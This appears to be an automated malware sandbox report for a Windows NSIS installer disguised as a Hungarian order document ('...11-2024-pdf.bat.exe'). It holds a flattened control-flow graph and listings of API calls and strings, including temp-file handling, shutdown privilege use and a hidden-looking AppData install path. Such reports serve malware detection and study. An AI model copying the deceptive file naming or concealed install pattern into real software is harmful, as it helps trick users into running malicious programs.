GlobalFree 4544->4545 4546 40689c GlobalAlloc 4544->4546 4547 406913 GlobalAlloc 4544->4547 4548 40690a GlobalFree 4544->4548 4545->4546 4546->4543 4546->4544 4547->4543 4547->4544 4548->4547 4549->4516 5337 404c68 GetDlgItem GetDlgItem 5338 404cba 7 API calls 5337->5338 5350 404ed3 5337->5350 5339 404d50 SendMessageW 5338->5339 5340 404d5d DeleteObject 5338->5340 5339->5340 5341 404d66 5340->5341 5343 404d9d 5341->5343 5344 4062a6 17 API calls 5341->5344 5342 404fb7 5346 405063 5342->5346 5352 404ec6 5342->5352 5357 405010 SendMessageW 5342->5357 5345 4041fb 18 API calls 5343->5345 5347 404d7f SendMessageW SendMessageW 5344->5347 5351 404db1 5345->5351 5348 405075 5346->5348 5349 40506d SendMessageW 5346->5349 5347->5341 5359 405087 ImageList_Destroy 5348->5359 5360 40508e 5348->5360 5368 40509e 5348->5368 5349->5348 5350->5342 5355 404bb6 5 API calls 5350->5355 5371 404f44 5350->5371 5356 4041fb 18 API calls 5351->5356 5353 404262 8 API calls 5352->5353 5358 405259 5353->5358 5354 404fa9 SendMessageW 5354->5342 5355->5371 5372 404dbf 5356->5372 5357->5352 5362 405025 SendMessageW 5357->5362 5359->5360 5363 405097 GlobalFree 5360->5363 5360->5368 5361 40520d 5361->5352 5366 40521f ShowWindow GetDlgItem ShowWindow 5361->5366 5365 405038 5362->5365 5363->5368 5364 404e94 GetWindowLongW SetWindowLongW 5367 404ead 5364->5367 5374 405049 SendMessageW 5365->5374 5366->5352 5369 404eb3 ShowWindow 5367->5369 5370 404ecb 5367->5370 5368->5361 5373 4050d9 5368->5373 5381 404c36 4 API calls 5368->5381 5388 404230 SendMessageW 5369->5388 5389 404230 SendMessageW 5370->5389 5371->5342 5371->5354 5372->5364 5375 404e8e 5372->5375 5378 404e0f SendMessageW 5372->5378 5379 404e4b SendMessageW 5372->5379 5380 404e5c SendMessageW 5372->5380 5384 405107 SendMessageW 5373->5384 5387 40511d 5373->5387 5374->5346 5375->5364 5375->5367 5378->5372 5379->5372 5380->5372 5381->5373 5382 4051e3 InvalidateRect 5382->5361 5383 4051f9 5382->5383 5390 404b71 5383->5390 5384->5387 5386 405191 
SendMessageW SendMessageW 5386->5387 5387->5382 5387->5386 5388->5352 5389->5350 5393 404aa8 5390->5393 5392 404b86 5392->5361 5394 404ac1 5393->5394 5395 4062a6 17 API calls 5394->5395 5396 404b25 5395->5396 5397 4062a6 17 API calls 5396->5397 5398 404b30 5397->5398 5399 4062a6 17 API calls 5398->5399 5400 404b46 lstrlenW wsprintfW SetDlgItemTextW 5399->5400 5400->5392 5401 402868 5402 402c41 17 API calls 5401->5402 5403 40286f FindFirstFileW 5402->5403 5404 402882 5403->5404 5405 402897 5403->5405 5409 4061cb wsprintfW 5405->5409 5407 4028a0 5410 406284 lstrcpynW 5407->5410 5409->5407 5410->5404 5411 401968 5412 402c1f 17 API calls 5411->5412 5413 40196f 5412->5413 5414 402c1f 17 API calls 5413->5414 5415 40197c 5414->5415 5416 402c41 17 API calls 5415->5416 5417 401993 lstrlenW 5416->5417 5419 4019a4 5417->5419 5418 4019e5 5419->5418 5423 406284 lstrcpynW 5419->5423 5421 4019d5 5421->5418 5422 4019da lstrlenW 5421->5422 5422->5418 5423->5421 5424 40166a 5425 402c41 17 API calls 5424->5425 5426 401670 5425->5426 5427 4065c7 2 API calls 5426->5427 5428 401676 5427->5428 4599 6fbc2997 4600 6fbc29e7 4599->4600 4601 6fbc29a7 VirtualProtect 4599->4601 4601->4600 5429 40436b lstrlenW 5430 40438a 5429->5430 5431 40438c WideCharToMultiByte 5429->5431 5430->5431 5432 4046ec 5433 404718 5432->5433 5434 404729 5432->5434 5493 4058ce GetDlgItemTextW 5433->5493 5435 404735 GetDlgItem 5434->5435 5442 404794 5434->5442 5437 404749 5435->5437 5441 40475d SetWindowTextW 5437->5441 5445 405c04 4 API calls 5437->5445 5438 404878 5490 404a27 5438->5490 5495 4058ce GetDlgItemTextW 5438->5495 5439 404723 5440 406518 5 API calls 5439->5440 5440->5434 5446 4041fb 18 API calls 5441->5446 5442->5438 5447 4062a6 17 API calls 5442->5447 5442->5490 5444 404262 8 API calls 5449 404a3b 5444->5449 5450 404753 5445->5450 5451 404779 5446->5451 5452 404808 SHBrowseForFolderW 5447->5452 5448 4048a8 5453 405c61 18 API calls 5448->5453 5450->5441 5457 405b59 3 API calls 5450->5457 5454 4041fb 18 API 
calls 5451->5454 5452->5438 5455 404820 CoTaskMemFree 5452->5455 5456 4048ae 5453->5456 5458 404787 5454->5458 5459 405b59 3 API calls 5455->5459 5496 406284 lstrcpynW 5456->5496 5457->5441 5494 404230 SendMessageW 5458->5494 5462 40482d 5459->5462 5464 404864 SetDlgItemTextW 5462->5464 5468 4062a6 17 API calls 5462->5468 5463 40478d 5466 40665e 5 API calls 5463->5466 5464->5438 5465 4048c5 5467 40665e 5 API calls 5465->5467 5466->5442 5475 4048cc 5467->5475 5469 40484c lstrcmpiW 5468->5469 5469->5464 5471 40485d lstrcatW 5469->5471 5470 40490d 5497 406284 lstrcpynW 5470->5497 5471->5464 5473 404914 5474 405c04 4 API calls 5473->5474 5476 40491a GetDiskFreeSpaceW 5474->5476 5475->5470 5479 405ba5 2 API calls 5475->5479 5480 404965 5475->5480 5478 40493e MulDiv 5476->5478 5476->5480 5478->5480 5479->5475 5481 4049d6 5480->5481 5482 404b71 20 API calls 5480->5482 5483 4049f9 5481->5483 5485 40140b 2 API calls 5481->5485 5484 4049c3 5482->5484 5498 40421d KiUserCallbackDispatcher 5483->5498 5486 4049d8 SetDlgItemTextW 5484->5486 5487 4049c8 5484->5487 5485->5483 5486->5481 5489 404aa8 20 API calls 5487->5489 5489->5481 5490->5444 5491 404a15 5491->5490 5499 404645 5491->5499 5493->5439 5494->5463 5495->5448 5496->5465 5497->5473 5498->5491 5500 404653 5499->5500 5501 404658 SendMessageW 5499->5501 5500->5501 5501->5490 4668 40176f 4669 402c41 17 API calls 4668->4669 4670 401776 4669->4670 4671 401796 4670->4671 4672 40179e 4670->4672 4708 406284 lstrcpynW 4671->4708 4709 406284 lstrcpynW 4672->4709 4675 40179c 4679 406518 5 API calls 4675->4679 4676 4017a9 4677 405b59 3 API calls 4676->4677 4678 4017af lstrcatW 4677->4678 4678->4675 4684 4017bb 4679->4684 4680 4017f7 4682 405d55 2 API calls 4680->4682 4681 4065c7 2 API calls 4681->4684 4682->4684 4684->4680 4684->4681 4685 4017cd CompareFileTime 4684->4685 4686 40188d 4684->4686 4687 401864 4684->4687 4690 406284 lstrcpynW 4684->4690 4696 4062a6 17 API calls 4684->4696 4707 405d7a GetFileAttributesW CreateFileW 
4684->4707 4710 4058ea 4684->4710 4685->4684 4688 4052ec 24 API calls 4686->4688 4689 4052ec 24 API calls 4687->4689 4706 401879 4687->4706 4691 401897 4688->4691 4689->4706 4690->4684 4692 403116 35 API calls 4691->4692 4693 4018aa 4692->4693 4694 4018be SetFileTime 4693->4694 4695 4018d0 CloseHandle 4693->4695 4694->4695 4697 4018e1 4695->4697 4695->4706 4696->4684 4698 4018e6 4697->4698 4699 4018f9 4697->4699 4700 4062a6 17 API calls 4698->4700 4701 4062a6 17 API calls 4699->4701 4703 4018ee lstrcatW 4700->4703 4704 401901 4701->4704 4703->4704 4705 4058ea MessageBoxIndirectW 4704->4705 4705->4706 4707->4684 4708->4675 4709->4676 4711 4058ff 4710->4711 4712 40594b 4711->4712 4713 405913 MessageBoxIndirectW 4711->4713 4712->4684 4713->4712 4714 4027ef 4715 402a70 4714->4715 4716 4027f6 4714->4716 4717 402c1f 17 API calls 4716->4717 4718 4027fd 4717->4718 4719 40280c SetFilePointer 4718->4719 4719->4715 4720 40281c 4719->4720 4722 4061cb wsprintfW 4720->4722 4722->4715 5502 401a72 5503 402c1f 17 API calls 5502->5503 5504 401a7b 5503->5504 5505 402c1f 17 API calls 5504->5505 5506 401a20 5505->5506 5514 401573 5515 401583 ShowWindow 5514->5515 5516 40158c 5514->5516 5515->5516 5517 402ac5 5516->5517 5518 40159a ShowWindow 5516->5518 5518->5517 5519 401cf3 5520 402c1f 17 API calls 5519->5520 5521 401cf9 IsWindow 5520->5521 5522 401a20 5521->5522 5523 402df3 5524 402e05 SetTimer 5523->5524 5526 402e1e 5523->5526 5524->5526 5525 402e73 5526->5525 5527 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5526->5527 5527->5525 5528 4014f5 SetForegroundWindow 5529 402ac5 5528->5529 5530 402576 5531 402c41 17 API calls 5530->5531 5532 40257d 5531->5532 5535 405d7a GetFileAttributesW CreateFileW 5532->5535 5534 402589 5535->5534 4909 401b77 4910 401b84 4909->4910 4911 401bc8 4909->4911 4916 401b9b 4910->4916 4918 401c0d 4910->4918 4912 401bf2 GlobalAlloc 4911->4912 4913 401bcd 4911->4913 4915 4062a6 17 API calls 4912->4915 4924 4022f7 4913->4924 4930 406284 lstrcpynW 
4913->4930 4914 4062a6 17 API calls 4919 4022f1 4914->4919 4915->4918 4928 406284 lstrcpynW 4916->4928 4918->4914 4918->4924 4922 4058ea MessageBoxIndirectW 4919->4922 4921 401bdf GlobalFree 4921->4924 4922->4924 4923 401baa 4929 406284 lstrcpynW 4923->4929 4926 401bb9 4931 406284 lstrcpynW 4926->4931 4928->4923 4929->4926 4930->4921 4931->4924 5536 4024f8 5537 402c81 17 API calls 5536->5537 5538 402502 5537->5538 5539 402c1f 17 API calls 5538->5539 5540 40250b 5539->5540 5541 402533 RegEnumValueW 5540->5541 5542 402527 RegEnumKeyW 5540->5542 5544 40288b 5540->5544 5543 402548 RegCloseKey 5541->5543 5542->5543 5543->5544 5546 40167b 5547 402c41 17 API calls 5546->5547 5548 401682 5547->5548 5549 402c41 17 API calls 5548->5549 5550 40168b 5549->5550 5551 402c41 17 API calls 5550->5551 5552 401694 MoveFileW 5551->5552 5553 4016a0 5552->5553 5554 4016a7 5552->5554 5555 401423 24 API calls 5553->5555 5556 4065c7 2 API calls 5554->5556 5558 402250 5554->5558 5555->5558 5557 4016b6 5556->5557 5557->5558 5559 40604a 36 API calls 5557->5559 5559->5553 5560 6fbc1000 5561 6fbc101b 5 API calls 5560->5561 5562 6fbc1019 5561->5562 5563 401e7d 5564 402c41 17 API calls 5563->5564 5565 401e83 5564->5565 5566 402c41 17 API calls 5565->5566 5567 401e8c 5566->5567 5568 402c41 17 API calls 5567->5568 5569 401e95 5568->5569 5570 402c41 17 API calls 5569->5570 5571 401e9e 5570->5571 5572 401423 24 API calls 5571->5572 5573 401ea5 5572->5573 5580 4058b0 ShellExecuteExW 5573->5580 5575 401ee7 5577 40288b 5575->5577 5581 40670f WaitForSingleObject 5575->5581 5578 401f01 CloseHandle 5578->5577 5580->5575 5582 406729 5581->5582 5583 40673b GetExitCodeProcess 5582->5583 5584 40669a 2 API calls 5582->5584 5583->5578 5585 406730 WaitForSingleObject 5584->5585 5585->5582 5586 6fbc2301 5587 6fbc236b 5586->5587 5588 6fbc2395 5587->5588 5589 6fbc2376 GlobalAlloc 5587->5589 5589->5587 5590 4019ff 5591 402c41 17 API calls 5590->5591 5592 401a06 5591->5592 5593 402c41 17 API calls 5592->5593 5594 
401a0f 5593->5594 5595 401a16 lstrcmpiW 5594->5595 5596 401a28 lstrcmpW 5594->5596 5597 401a1c 5595->5597 5596->5597 5598 401000 5599 401037 BeginPaint GetClientRect 5598->5599 5602 40100c DefWindowProcW 5598->5602 5600 4010f3 5599->5600 5604 401073 CreateBrushIndirect FillRect DeleteObject 5600->5604 5605 4010fc 5600->5605 5603 401179 5602->5603 5604->5600 5606 401102 CreateFontIndirectW 5605->5606 5607 401167 EndPaint 5605->5607 5606->5607 5608 401112 6 API calls 5606->5608 5607->5603 5608->5607 5616 401503 5617 40150b 5616->5617 5619 40151e 5616->5619 5618 402c1f 17 API calls 5617->5618 5618->5619 4550 402484 4561 402c81 4550->4561 4553 402c41 17 API calls 4554 402497 4553->4554 4555 4024a2 RegQueryValueExW 4554->4555 4559 40288b 4554->4559 4556 4024c8 RegCloseKey 4555->4556 4557 4024c2 4555->4557 4556->4559 4557->4556 4566 4061cb wsprintfW 4557->4566 4562 402c41 17 API calls 4561->4562 4563 402c98 4562->4563 4564 4060f1 RegOpenKeyExW 4563->4564 4565 40248e 4564->4565 4565->4553 4566->4556 5620 402104 5621 402c41 17 API calls 5620->5621 5622 40210b 5621->5622 5623 402c41 17 API calls 5622->5623 5624 402115 5623->5624 5625 402c41 17 API calls 5624->5625 5626 40211f 5625->5626 5627 402c41 17 API calls 5626->5627 5628 402129 5627->5628 5629 402c41 17 API calls 5628->5629 5631 402133 5629->5631 5630 402172 CoCreateInstance 5635 402191 5630->5635 5631->5630 5632 402c41 17 API calls 5631->5632 5632->5630 5633 401423 24 API calls 5634 402250 5633->5634 5635->5633 5635->5634 5636 401f06 5637 402c41 17 API calls 5636->5637 5638 401f0c 5637->5638 5639 4052ec 24 API calls 5638->5639 5640 401f16 5639->5640 5641 40586d 2 API calls 5640->5641 5642 401f1c 5641->5642 5644 40288b 5642->5644 5645 40670f 5 API calls 5642->5645 5647 401f3f CloseHandle 5642->5647 5646 401f31 5645->5646 5646->5647 5649 4061cb wsprintfW 5646->5649 5647->5644 5649->5647 4658 40230c 4659 402314 4658->4659 4660 40231a 4658->4660 4661 402c41 17 API calls 4659->4661 4662 402c41 17 API calls 4660->4662 4664 
402328 4660->4664 4661->4660 4662->4664 4663 402336 4666 402c41 17 API calls 4663->4666 4664->4663 4665 402c41 17 API calls 4664->4665 4665->4663 4667 40233f WritePrivateProfileStringW 4666->4667 5650 40190c 5651 401943 5650->5651 5652 402c41 17 API calls 5651->5652 5653 401948 5652->5653 5654 405996 67 API calls 5653->5654 5655 401951 5654->5655 5656 401f8c 5657 402c41 17 API calls 5656->5657 5658 401f93 5657->5658 5659 40665e 5 API calls 5658->5659 5660 401fa2 5659->5660 5661 402026 5660->5661 5662 401fbe GlobalAlloc 5660->5662 5662->5661 5663 401fd2 5662->5663 5664 40665e 5 API calls 5663->5664 5665 401fd9 5664->5665 5666 40665e 5 API calls 5665->5666 5667 401fe3 5666->5667 5667->5661 5671 4061cb wsprintfW 5667->5671 5669 402018 5672 4061cb wsprintfW 5669->5672 5671->5669 5672->5661 5673 6fbc1671 5674 6fbc1516 GlobalFree 5673->5674 5677 6fbc1689 5674->5677 5675 6fbc16cf GlobalFree 5676 6fbc16a4 5676->5675 5677->5675 5677->5676 5678 6fbc16bb VirtualFree 5677->5678 5678->5675 5679 40238e 5680 4023c1 5679->5680 5681 402396 5679->5681 5682 402c41 17 API calls 5680->5682 5683 402c81 17 API calls 5681->5683 5684 4023c8 5682->5684 5685 40239d 5683->5685 5690 402cff 5684->5690 5687 402c41 17 API calls 5685->5687 5688 4023d5 5685->5688 5689 4023ae RegDeleteValueW RegCloseKey 5687->5689 5689->5688 5691 402d13 5690->5691 5692 402d0c 5690->5692 5691->5692 5694 402d44 5691->5694 5692->5688 5695 4060f1 RegOpenKeyExW 5694->5695 5696 402d72 5695->5696 5697 402d98 RegEnumKeyW 5696->5697 5698 402daf RegCloseKey 5696->5698 5699 402dd0 RegCloseKey 5696->5699 5702 402d44 6 API calls 5696->5702 5704 402dc3 5696->5704 5697->5696 5697->5698 5700 40665e 5 API calls 5698->5700 5699->5704 5701 402dbf 5700->5701 5703 402de0 RegDeleteKeyW 5701->5703 5701->5704 5702->5696 5703->5704 5704->5692 5705 40698e 5707 406812 5705->5707 5706 40717d 5707->5706 5708 406893 GlobalFree 5707->5708 5709 40689c GlobalAlloc 5707->5709 5710 406913 GlobalAlloc 5707->5710 5711 40690a GlobalFree 5707->5711 
5708->5709 5709->5706 5709->5707 5710->5706 5710->5707 5711->5710 5712 40190f 5713 402c41 17 API calls 5712->5713 5714 401916 5713->5714 5715 4058ea MessageBoxIndirectW 5714->5715 5716 40191f 5715->5716 5717 401491 5718 4052ec 24 API calls 5717->5718 5719 401498 5718->5719 5720 401d14 5721 402c1f 17 API calls 5720->5721 5722 401d1b 5721->5722 5723 402c1f 17 API calls 5722->5723 5724 401d27 GetDlgItem 5723->5724 5725 402592 5724->5725 5733 402598 5734 4025c7 5733->5734 5735 4025ac 5733->5735 5736 4025fb 5734->5736 5737 4025cc 5734->5737 5738 402c1f 17 API calls 5735->5738 5740 402c41 17 API calls 5736->5740 5739 402c41 17 API calls 5737->5739 5745 4025b3 5738->5745 5741 4025d3 WideCharToMultiByte lstrlenA 5739->5741 5742 402602 lstrlenW 5740->5742 5741->5745 5742->5745 5743 402645 5744 40262f 5744->5743 5746 405e2c WriteFile 5744->5746 5745->5743 5745->5744 5747 405e5b 5 API calls 5745->5747 5746->5743 5747->5744 5748 6fbc10e1 5757 6fbc1111 5748->5757 5749 6fbc11d8 GlobalFree 5750 6fbc12ba 2 API calls 5750->5757 5751 6fbc11d3 5751->5749 5752 6fbc11f8 GlobalFree 5752->5757 5753 6fbc1272 2 API calls 5756 6fbc11c4 GlobalFree 5753->5756 5754 6fbc1164 GlobalAlloc 5754->5757 5755 6fbc12e1 lstrcpyW 5755->5757 5756->5757 5757->5749 5757->5750 5757->5751 5757->5752 5757->5753 5757->5754 5757->5755 5757->5756 5758 40149e 5759 4022f7 5758->5759 5760 4014ac PostQuitMessage 5758->5760 5760->5759 5761 401c1f 5762 402c1f 17 API calls 5761->5762 5763 401c26 5762->5763 5764 402c1f 17 API calls 5763->5764 5765 401c33 5764->5765 5766 401c48 5765->5766 5767 402c41 17 API calls 5765->5767 5768 401c58 5766->5768 5771 402c41 17 API calls 5766->5771 5767->5766 5769 401c63 5768->5769 5770 401caf 5768->5770 5772 402c1f 17 API calls 5769->5772 5773 402c41 17 API calls 5770->5773 5771->5768 5774 401c68 5772->5774 5775 401cb4 5773->5775 5776 402c1f 17 API calls 5774->5776 5777 402c41 17 API calls 5775->5777 5778 401c74 5776->5778 5779 401cbd FindWindowExW 5777->5779 5780 401c81 
SendMessageTimeoutW 5778->5780 5781 401c9f SendMessageW 5778->5781 5782 401cdf 5779->5782 5780->5782 5781->5782 5783 402aa0 SendMessageW 5784 402ac5 5783->5784 5785 402aba InvalidateRect 5783->5785 5785->5784 5786 402821 5787 402827 5786->5787 5788 402ac5 5787->5788 5789 40282f FindClose 5787->5789 5789->5788 5790 6fbc18dd 5791 6fbc1900 5790->5791 5792 6fbc1935 GlobalFree 5791->5792 5793 6fbc1947 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5791->5793 5792->5793 5794 6fbc1272 2 API calls 5793->5794 5795 6fbc1ad2 GlobalFree GlobalFree 5794->5795 4383 403d22 4384 403e75 4383->4384 4385 403d3a 4383->4385 4387 403ec6 4384->4387 4388 403e86 GetDlgItem GetDlgItem 4384->4388 4385->4384 4386 403d46 4385->4386 4389 403d51 SetWindowPos 4386->4389 4390 403d64 4386->4390 4392 403f20 4387->4392 4400 401389 2 API calls 4387->4400 4391 4041fb 18 API calls 4388->4391 4389->4390 4394 403d81 4390->4394 4395 403d69 ShowWindow 4390->4395 4396 403eb0 SetClassLongW 4391->4396 4445 403e70 4392->4445 4454 404247 4392->4454 4397 403da3 4394->4397 4398 403d89 DestroyWindow 4394->4398 4395->4394 4399 40140b 2 API calls 4396->4399 4402 403da8 SetWindowLongW 4397->4402 4403 403db9 4397->4403 4453 404184 4398->4453 4399->4387 4401 403ef8 4400->4401 4401->4392 4404 403efc SendMessageW 4401->4404 4402->4445 4407 403e62 4403->4407 4408 403dc5 GetDlgItem 4403->4408 4404->4445 4405 40140b 2 API calls 4443 403f32 4405->4443 4406 404186 DestroyWindow EndDialog 4406->4453 4476 404262 4407->4476 4411 403dd8 SendMessageW IsWindowEnabled 4408->4411 4412 403df5 4408->4412 4410 4041b5 ShowWindow 4410->4445 4411->4412 4411->4445 4414 403e02 4412->4414 4415 403e49 SendMessageW 4412->4415 4416 403e15 4412->4416 4425 403dfa 4412->4425 4413 4062a6 17 API calls 4413->4443 4414->4415 4414->4425 4415->4407 4418 403e32 4416->4418 4419 403e1d 4416->4419 4422 40140b 2 API calls 4418->4422 4470 40140b 4419->4470 4420 403e30 4420->4407 4424 403e39 4422->4424 4423 4041fb 18 API calls 4423->4443 4424->4407 
                                              Control-flow Graph

                                              APIs
                                              • SetErrorMode.KERNELBASE ref: 0040337C
                                              • GetVersion.KERNEL32 ref: 00403382
                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033B5
                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033F2
                                              • OleInitialize.OLE32(00000000), ref: 004033F9
                                              • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 00403415
                                              • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040342A
                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00000020,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00000000,?,00000006,00000008,0000000A), ref: 00403462
                                                • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040359C
                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035AD
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B9
                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CD
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035D5
                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E6
                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035EE
                                              • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403602
                                                • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                              • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036CD
                                              • ExitProcess.KERNEL32 ref: 004036EE
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403710
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371B
                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403727
                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403743
                                              • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 0040379D
                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 004037B1
                                              • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037DE
                                              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040380D
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403814
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403829
                                              • AdjustTokenPrivileges.ADVAPI32 ref: 0040384C
                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403871
                                              • ExitProcess.KERNEL32 ref: 00403894
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                              • String ID: "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Synthesizations$C:\Users\user\Desktop$C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                              • API String ID: 3441113951-3540403757
                                              • Opcode ID: 3b799489f38086b66f8157c52dfdd850dbfcc699f0e2a59af50d3155f203b837
                                              • Instruction ID: 33263885e95349ea6af21411810ae013db8a0064eb9284cbb984bc5e65c45519
                                              • Opcode Fuzzy Hash: 3b799489f38086b66f8157c52dfdd850dbfcc699f0e2a59af50d3155f203b837
                                              • Instruction Fuzzy Hash: ABD12771200301ABD7207F659D45B3B3AACEB4074AF50487FF881B62E1DB7E8A55876E

                                              Control-flow Graph

                                              APIs
                                              • GetDlgItem.USER32(?,00000403), ref: 00405489
                                              • GetDlgItem.USER32(?,000003EE), ref: 00405498
                                              • GetClientRect.USER32(?,?), ref: 004054D5
                                              • GetSystemMetrics.USER32(00000002), ref: 004054DC
                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054FD
                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040550E
                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405521
                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040552F
                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405542
                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405564
                                              • ShowWindow.USER32(?,00000008), ref: 00405578
                                              • GetDlgItem.USER32(?,000003EC), ref: 00405599
                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A9
                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055C2
                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055CE
                                              • GetDlgItem.USER32(?,000003F8), ref: 004054A7
                                                • Part of subcall function 00404230: SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E
                                              • GetDlgItem.USER32(?,000003EC), ref: 004055EB
                                              • CreateThread.KERNEL32(00000000,00000000,Function_000053BF,00000000), ref: 004055F9
                                              • CloseHandle.KERNELBASE(00000000), ref: 00405600
                                              • ShowWindow.USER32(00000000), ref: 00405624
                                              • ShowWindow.USER32(?,00000008), ref: 00405629
                                              • ShowWindow.USER32(00000008), ref: 00405673
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A7
                                              • CreatePopupMenu.USER32 ref: 004056B8
                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056CC
                                              • GetWindowRect.USER32(?,?), ref: 004056EC
                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405705
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040573D
                                              • OpenClipboard.USER32(00000000), ref: 0040574D
